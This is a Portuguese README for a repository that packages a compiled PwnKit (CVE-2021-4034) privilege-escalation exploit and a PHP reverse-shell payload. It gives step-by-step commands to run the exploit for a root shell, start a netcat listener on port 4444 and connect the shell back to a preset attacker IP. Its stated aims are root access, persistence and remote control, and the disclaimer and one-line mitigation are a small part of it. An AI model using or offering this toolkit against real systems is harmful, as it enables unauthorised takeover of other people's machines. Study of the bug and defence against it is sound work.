
Repositório de pesquisa de segurança que contém uma Prova de Conceito (PoC) para a vulnerabilidade CVE-2021-4034 (PwnKit) e utilitários de script para a demonstração de escalada de privilégios e execução remota em ambientes Linux.
⚠️ AVISO: Este repositório foi criado apenas para fins educacionais e de pesquisa de segurança. O autor não se responsabiliza pelo uso indevido destas ferramentas. Use apenas em ambientes controlados ou onde você tenha permissão explícita.
Este repositório contém uma Prova de Conceito (PoC) compilada para a vulnerabilidade PwnKit (CVE-2021-4034), uma falha crítica de escalada de privilégios local no componente pkexec do Polkit.
Além disso, é incluído um script de Reverse Shell em PHP pronto para ser implantado após a exploração ou como vetor de acesso inicial.
Alcançar acesso root em sistemas Linux vulneráveis e estabelecer persistência ou controle remoto através de uma shell reversa.
PwnKit (ELF Binary)O exploit compilado para CVE-2021-4034.
pkexec para carregar uma biblioteca compartilhada maliciosa e executar código como root.pkexec esteja instalado no alvo.reverseShell.phpUm payload leve para estabelecer uma conexão reversa.
192.168.1.84444/bin/bashphp reverseShell.php) ou injetado em um servidor web vulnerável.PwnKit para o sistema vítima.chmod +x PwnKit
./PwnKit
Se for bem-sucedido, você deve obter uma shell com privilégios de root imediatamente.nc -lvnp 4444
reverseShell.php se seu IP for diferente do configurado por padrão.php reverseShell.php
Esta vulnerabilidade reside em como o pkexec lida com os argumentos da linha de comando. Ao passar uma lista de argumentos vazia, o pkexec tenta acessar argv[1] fora dos limites, o que permite a um atacante sobrescrever variáveis de ambiente na memória, especificamente injetando uma variável GCONV_PATH maliciosa para sequestrar o fluxo de execução.
Para se proteger contra este exploit:
chmod 0755 /usr/bin/pkexec
Happy Hacking! 🏴☠️